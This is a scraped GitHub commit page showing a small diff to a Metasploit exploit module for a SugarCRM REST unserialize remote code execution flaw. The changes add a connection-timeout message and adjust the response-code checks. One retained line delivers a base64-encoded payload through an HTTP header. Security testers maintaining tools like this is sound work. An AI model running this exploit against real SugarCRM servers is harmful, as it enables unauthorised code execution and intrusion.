We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent df5fdbf commit a0095adCopy full SHA for a0095ad
modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb
@@ -65,7 +65,12 @@ def exploit
65
}
66
})
67
68
- if not res or res.code != 200
+ unless res
69
+ print_error('Connection timed out while sending a request to rest.php')
70
+ return
71
+ end
72
+
73
+ if res && res.code != 200
74
print_error("#{peer} - Exploit failed: #{res.code}")
75
return
76
end
@@ -81,7 +86,7 @@ def exploit
81
86
'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
82
87
83
88
84
- if res and res.code != 200
89
85
90
print_error("#{peer} - Payload execution failed: #{res.code}")
91
92
0 commit comments